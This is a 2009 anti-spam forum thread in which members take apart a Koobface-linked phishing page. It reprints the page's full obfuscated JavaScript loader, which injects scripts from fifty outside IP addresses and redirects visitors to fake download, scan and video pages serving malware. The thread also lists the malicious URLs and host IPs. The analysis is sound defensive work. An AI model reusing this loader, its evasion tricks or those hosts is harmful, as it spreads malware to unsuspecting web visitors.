Social sites phish/worm hosting on AS39023



Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 3:15 pm

Source of "http://fraghouse.ichclan.at/572/?go" is below. Note that the strings listed next are not real links on that page: the social-network domains are the keys of a referrer-matching table inside the script, and the dotted fragments are the two halves of IP addresses that the script concatenates at runtime to build its list of next-stage hosts. Strings a link extractor pulled out of it:
http://fraghouse.ichclan.at/572/facebook.com
http://fraghouse.ichclan.at/572/tagged.com
http://fraghouse.ichclan.at/572/friendster.com
http://fraghouse.ichclan.at/572/myspace.com
http://fraghouse.ichclan.at/572/msplinks.com
http://fraghouse.ichclan.at/572/lnk.ms
http://fraghouse.ichclan.at/572/myyearbook.com
http://fraghouse.ichclan.at/572/fubar.com
http://fraghouse.ichclan.at/572/twitter.com
http://fraghouse.ichclan.at/572/hi5.com
http://fraghouse.ichclan.at/572/bebo.com
http://fraghouse.ichclan.at/572/.132.128.31
http://fraghouse.ichclan.at/572/.235.164.159
http://fraghouse.ichclan.at/572/137.4
http://fraghouse.ichclan.at/572/9.253.146
http://fraghouse.ichclan.at/572/.33.126.237
http://fraghouse.ichclan.at/572/97.81.
http://fraghouse.ichclan.at/572/104.176
http://fraghouse.ichclan.at/572/24.1
http://fraghouse.ichclan.at/572/45.33.205
http://fraghouse.ichclan.at/572/08.126.22.90
http://fraghouse.ichclan.at/572/79.178
http://fraghouse.ichclan.at/572/.48.193
http://fraghouse.ichclan.at/572/93.17
http://fraghouse.ichclan.at/572/5.40.214
http://fraghouse.ichclan.at/572/.250.166.77
http://fraghouse.ichclan.at/572/.78.128.27
http://fraghouse.ichclan.at/572/69.2
http://fraghouse.ichclan.at/572/05.213.172
http://fraghouse.ichclan.at/572/.128.14.14

Source:
<script>
// KROTEG
// Referrer-match table: [substring looked for in document.referrer, brand code
// passed to the next-stage script as "/f=<code>"]. Matching is a plain
// indexOf(), so any referrer URL that merely contains the string selects that
// entry; the first matching row wins. Three MySpace-related domains
// (myspace.com, msplinks.com, lnk.ms) share the code 'ms'.
var pdousaqbmlxzcywfj8 = [
['facebook.com',  'fb2'],
['tagged.com',    'tg'],
['friendster.com','fr'],
['myspace.com',   'ms'],
['msplinks.com',  'ms'],
['lnk.ms',  'ms'],
['myyearbook.com','yb'],
['fubar.com',     'fu'],
['twitter.com',   'tw'],
['hi5.com',       'hi5'],
['bebo.com',      'be']
];
// Fifty next-stage hosts. Every address is written as two concatenated string
// halves so no complete dotted IPv4 literal appears in the page source (defeats
// naive IP-pattern scanning); at runtime each element is an ordinary address.
// The loader below contacts ALL of them, not a random pick.
var xipjfslbtvmzgkao6 = [
'217' + '.132.128.31',
'98' + '.235.164.159',
'137.4' + '9.253.146',
'75' + '.33.126.237',
'97.81.' + '104.176',
'24.1' + '45.33.205',
'2' + '08.126.22.90',
'79.178' + '.48.193',
'93.17' + '5.40.214',
'85' + '.250.166.77',
'89' + '.78.128.27',
'69.2' + '05.213.172',
'203' + '.128.14.14',
'218' + '.168.124.246',
'94' + '.168.88.175',
'84.2' + '23.71.54',
'86' + '.2.249.242',
'61.93' + '.177.17',
'88.18' + '5.77.165',
'79.180' + '.136.188',
'88' + '.203.78.208',
'98.24' + '2.180.185',
'75.250.' + '179.122',
'115.' + '240.63.182',
'8' + '9.138.109.48',
'83.' + '93.9.216',
'95' + '.35.35.13',
'75' + '.132.234.213',
'209' + '.237.70.23',
'1' + '24.82.104.216',
'99.66' + '.69.109',
'75.4' + '.10.58',
'92.' + '143.67.161',
'74.' + '210.38.68',
'2' + '21.126.3.32',
'84' + '.109.75.232',
'92.236' + '.168.31',
'1' + '10.36.14.97',
'7' + '8.132.195.59',
'75.65' + '.253.230',
'24' + '.151.241.242',
'96.' + '237.121.115',
'6' + '8.206.98.117',
'79.181' + '.118.186',
'83.21' + '2.71.30',
'134' + '.99.134.85',
'79.' + '173.218.166',
'79.178' + '.136.68',
'69' + '.223.176.37',
'8' + '3.252.196.230'];
// Four always-empty strings spliced into the pieces of "document.referrer" so
// that the property name never occurs as a single literal; eval() reassembles
// and evaluates it. Net effect: jazwkchdgspfvrnmoytb0 = String(document.referrer).
var zqnfwerkvbc3 = '', lmuahzfrjocktyg8 = '', iujoaqrdphg1 = '', ibudrxcywlmsovphngke9 = '';
// cnbyos2 holds the "/f=<brand>" path segment for the next-stage URL, or '' if
// the referrer matches nothing.
var jazwkchdgspfvrnmoytb0 = '' + eval('doc'+zqnfwerkvbc3+'ume'+lmuahzfrjocktyg8+'nt.r'+iujoaqrdphg1+'efer'+ibudrxcywlmsovphngke9+'rer'), cnbyos2 = '';
// First table row whose domain string occurs anywhere in the referrer wins.
for (var jnkethcbzgmrdlwqx3 = 0; jnkethcbzgmrdlwqx3 < pdousaqbmlxzcywfj8.length; jnkethcbzgmrdlwqx3 ++) {
    if ((jazwkchdgspfvrnmoytb0.indexOf(pdousaqbmlxzcywfj8[jnkethcbzgmrdlwqx3][0]) != -1)) {
      cnbyos2 = '/f=' + pdousaqbmlxzcywfj8[jnkethcbzgmrdlwqx3][1];
      break;
    }
}
// Two overrides, both forcing the 'ms' brand: a Google Reader shared-items
// referrer that carries ?id=, or a landing URL containing "?go&ms".
if ((jazwkchdgspfvrnmoytb0.indexOf('google.com/reader/shared') != -1) && (jazwkchdgspfvrnmoytb0.indexOf('?id=') != -1)) cnbyos2 = '/f=ms';
if (location.href.indexOf('?go&ms') != -1) cnbyos2 = '/f=ms';
// Redirect slot. Nothing in this page assigns a non-empty value to it; the
// go.js files injected below are presumably what set it (not visible here --
// confirm against a captured go.js). Whatever value is present at a poll tick
// is used, so with many injected scripts the effective winner is the last one
// to write before that tick.
window.redirect = '';
// Poll window.redirect every 50 ms and navigate the top-level page to it once it
// is non-empty. Both "window.redirect" and "window.location.href = ..." are
// assembled from string fragments and eval'd so neither appears as a literal.
// The poll never stops on its own if no script ever sets the value. Note the
// setTimeout() callback is itself a string, i.e. another implicit eval.
function cnvoekxspzaqyhlt1() {
   var praenouhzdqm2 = '' + eval('win'+'dow.r'+'edir'+'ect;');
   if (praenouhzdqm2.length > 0) eval('wi'+'ndow'+'.lo'+'cati'+'on.hr'+'ef = praenouhzdqm2;');
   else setTimeout('cnvoekxspzaqyhlt1()', 50);
}
cnvoekxspzaqyhlt1();
// Choose the landing-page template for the next stage from the numeric ?id=
// value in the current URL. Default is "/view". "location.href" is again built
// from fragments and eval'd.
var js = '/vi'+'ew', l = '' + eval('loc'+'at'+'ion.'+'hr'+'ef');
var n = l.indexOf('?i'+'d=');
if (n != -1) {
   // n + 4 skips past "?id="; parseInt() stops at the first non-digit, so any
   // trailing query text is ignored. No radix is given, so on older engines an
   // id with a leading zero could be read as octal (behaviour not verified).
   n = parseInt(l.substr(n + 4));
   // Buckets: < 101 -> /cnet, 101-200 -> /view, 201-300 -> /scan,
   // 301-400 -> /warn, 401-500 -> /youtube. 501 and above, or a non-numeric id
   // (NaN fails every comparison), keep the "/view" default.
   if (n < 101) js = '/c'+'ne'+'t';
   else if (n < 201) js = '/vi'+'ew';
   else if (n < 301) js = '/sc'+'an';
   else if (n < 401) js = '/wa'+'rn';
   else if (n < 501) js = '/y'+'out'+'ube';
}
// ss = the page's own query string (location.search, leading "?" included); it
// is forwarded verbatim to every next-stage host.
var ss = '' + eval('l'+'oca'+'ti'+'on.s'+'ear'+'ch');
// No-op: both branches yield ss unchanged (kept byte-for-byte from the sample).
ss = (ss.length > 0 ? ss : '');
// Inject one external <script> per host in the table -- all fifty at once --
// each fetching, over plain HTTP:
//   http://<ip>/go.js?0x3E8<"/f=brand" or ""><template>/console=yes/<search>
// The "0x3E8" token (1000) is constant in this sample; its meaning is not
// established here (a campaign or affiliate id is plausible but unconfirmed).
// Tag name, MIME type, scheme and "head" are all split into fragments so none
// of them is a literal substring of the source. The loop index re-declares the
// same `var` used earlier, which is legal and reuses that binding.
for (var jnkethcbzgmrdlwqx3 = 0; jnkethcbzgmrdlwqx3 < xipjfslbtvmzgkao6.length; jnkethcbzgmrdlwqx3 ++) {
   var nn = 'sc'+'rip'+'t', ugmktsronfzbljy7 = document.createElement(nn);
   ugmktsronfzbljy7.type = 'te'+'xt'+'/ja'+'va'+nn;
   ugmktsronfzbljy7.src = 'ht'+'tp:'+'//' + xipjfslbtvmzgkao6[jnkethcbzgmrdlwqx3] + '/go' + '.js' + '?0x'+'3E'+'8' + cnbyos2 + js + '/co'+'nsol'+'e=y'+'es/' + ss;
   document.getElementsByTagName('h'+'ea'+'d')[0].appendChild(ugmktsronfzbljy7);
}

</script>

Reported to parents of routing agent "tuxtools.com" which is a /23 operated by IpexMedia.com - who is also responsible for PharmacyExpress bogus ".at" domains.


Postby meep » Thu Nov 12, 2009 3:52 pm

Interesting multi-brand phish and already 404ed. Good for IpexMedia.com (not familiar with that hoster).

Checked a few:

--- 11/12/09 14:51:37 Eastern Standard Time
--- reading URL http://fraghouse.ichclan.at/572/lnk.ms
--- contacting host fraghouse.ichclan.at [195.42.120.133] on port 80

HTTP/1.1 404 Not Found
Date: Thu, 12 Nov 2009 19:51:35 GMT
Server: Apache/1.3.37 (Unix)  (Gentoo) mod_ssl/2.8.28 OpenSSL/0.9.8g TuxTrafficLogRotate/20051209-00 TuxSQLConf/20070207-00 mod_perl/1.29 PHP/4.4.7-tuxtools FrontPage/5.0.2.2635
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

119
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /572/lnk.ms was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.37 Server at fraghouse.ichclan.at Port 80</ADDRESS>
</BODY></HTML>

0


--- connection closed


Postby spamislame » Thu Nov 12, 2009 4:06 pm

In plain English:

That page reads document.referrer and, based on which social-network domain referred you, picks a brand code. It then injects go.js from all 50 of the listed IPs at once (not a single one of them) and polls a window.redirect variable; whichever injected script populates that variable is the one whose redirect the browser follows.

Example:

http://71.251.56.113/go.js?0x3E8/f=/cnet/console=yes/


Which in turn said it wanted to redirect to:

http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/cnet/console=yes/


Which attempts to resemble a "Download.com" page, which of course is shucking fake antivirus.

Other options include:

http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/view/console=yes/
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/scan/console=yes/
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/warn/console=yes/
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/youtube/console=yes/


Each of these replicate fake versions of Youtube and other video or fake "scan" sites.

Total list of IP's in ascending order:

24.214.69.74
41.249.43.41
61.238.54.87
65.24.95.126
65.30.16.121
67.149.142.169
67.149.244.132
69.247.230.251
69.94.216.132
70.238.172.197
71.205.189.174
71.251.56.113
71.92.208.150
72.129.238.62
75.136.110.214
75.201.65.133
75.84.9.161
76.77.131.148
78.97.194.11
79.178.206.85
79.178.255.218
79.183.206.160
82.130.160.2
83.24.15.30
83.254.58.105
85.65.92.44
88.23.209.95
89.138.102.132
91.58.246.83
95.139.171.207
95.76.131.219
95.86.70.239
97.103.226.87
98.141.162.79
98.240.244.36
98.251.64.174
99.190.80.217
99.234.96.18
99.63.143.54
111.119.174.129
131.111.224.99
188.24.247.198
195.0.200.145
196.206.225.194
200.119.229.149
207.144.103.37
207.98.243.4
212.35.94.195
213.112.199.191
213.47.12.62


Note that if you view 71.251.56.113 on its own you get a fake Facebook output.

SiL


Postby spamislame » Thu Nov 12, 2009 4:07 pm

Add: the "setup.exe" files each of these tries to get the user to execute are, of course, Koobface.

SiL


Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 4:27 pm

meep wrote:Interesting multi-brand phish and already 404ed. Good for IpexMedia.com (not familiar with that hoster).

Checked a few:

--- 11/12/09 14:51:37 Eastern Standard Time
--- reading URL http://fraghouse.ichclan.at/572/lnk.ms
--- contacting host fraghouse.ichclan.at [195.42.120.133] on port 80

HTTP/1.1 404 Not Found
Date: Thu, 12 Nov 2009 19:51:35 GMT
Server: Apache/1.3.37 (Unix)  (Gentoo) mod_ssl/2.8.28 OpenSSL/0.9.8g TuxTrafficLogRotate/20051209-00 TuxSQLConf/20070207-00 mod_perl/1.29 PHP/4.4.7-tuxtools FrontPage/5.0.2.2635
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

119
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /572/lnk.ms was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.37 Server at fraghouse.ichclan.at Port 80</ADDRESS>
</BODY></HTML>

0


--- connection closed

Interesting that the Server header shows an Apache 1.3.37 build carrying tuxtools-named modules (TuxTrafficLogRotate, TuxSQLConf, PHP/4.4.7-tuxtools). Whether tuxtools is essentially a phish-page deployment tool is pure supposition on my part; the header only proves a custom-branded Apache/PHP build.

But: I get no 404 at the spammed URL -- http://fraghouse.ichclan.at/572/?go still loads, and its source still contains all the strings I listed up top. (The 404s on /572/<domain> are expected: those paths were never served; they are table strings from the script that a link extractor turned into URLs.)


Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 4:39 pm

According to PC Magazine, Koobface has also just been modified to spread via image links on Google Reader, for those who have Reader accounts (consistent with the script above, which special-cases a google.com/reader/shared referrer).

Article just published in PCWorld discusses other facets of new koobface upgrade.


Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 4:56 pm

And now I'm seeing it on Blogspot and on Spaces (which Microsoft has just taken down, it appears), and I'm seeing it spoofing PayPal - I removed the url...

Just copying that PayPal phish url to my clipboard triggered an Avira alert.


Postby spamislame » Thu Nov 12, 2009 5:16 pm

Mr. Danchev is actively documenting all of this btw:

http://ddanchev.blogspot.com/2009/11/ko ... iness.html

Definitely a good (and entertaining) read.

SiL


Postby AlphaCentauri » Thu Nov 12, 2009 6:23 pm

MyCanadian Spammerdeath wrote:Hey, this is cool: Just copying that PayPal phish url to my clipboard triggered an Avira alert.


My Avira is getting apoplectic over this whole thread. Can we insert some invisible tags somewhere?


Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 6:23 pm

Heh: Pancho Panchev. Tribute.


Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 6:25 pm

AlphaCentauri wrote:
MyCanadian Spammerdeath wrote:Hey, this is cool: Just copying that PayPal phish url to my clipboard triggered an Avira alert.


My Avira is getting apoplectic over this whole thread. Can we insert some invisible tags somewhere?

I just removed the PayPal phish url.


Postby spamislame » Thu Nov 12, 2009 9:37 pm

Let me just say that that's a good sign (the Avira alerts.)

What's the market penetration of that tool?

SiL


Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 10:36 pm

spamislame wrote:What's the market penetration of that tool?

Their website claims over 100 million users worldwide. PC World and AV-Comparatives both rate it the best of the free AV programs, though other sources give that honor to AVG - I've used both, as well as Norton and others. So far I like Avira best - though AVG has more configuration options. But it (AVG) claims - in one of its forms - to be free, yet it stops working with an almost impossible uninstall, after a time.


Postby AlphaCentauri » Fri Nov 13, 2009 12:24 am

The full version of Avira is cheap ($25/year) and that includes the antispyware etc. If you set Noscript to always allow trusted sites, it's nice to have a backup warning in case one gets hacked and has malicious javascript inserted.


Postby Volksjaeger » Fri Nov 13, 2009 12:27 am

MyCanadian Spammerdeath wrote:
spamislame wrote:What's the market penetration of that tool?

Their website claims over 100 million users worldwide. PC World and AV-Comparatives both rate it the best of the free AV programs, though other sources give that honor to AVG - I've used both, as well as Norton and others. So far I like Avira best - though AVG has more configuration options. But it (AVG) claims - in one of its forms - to be free, yet it stops working with an almost impossible uninstall, after a time.


That's for sure, with regards to the impossible uninstall part the same is true for Avast although I finally fixed that problem. I still have registry keys that pop up even though I uninstalled the program years ago, or I did until I finally went through and manually deleted all of them by hand.
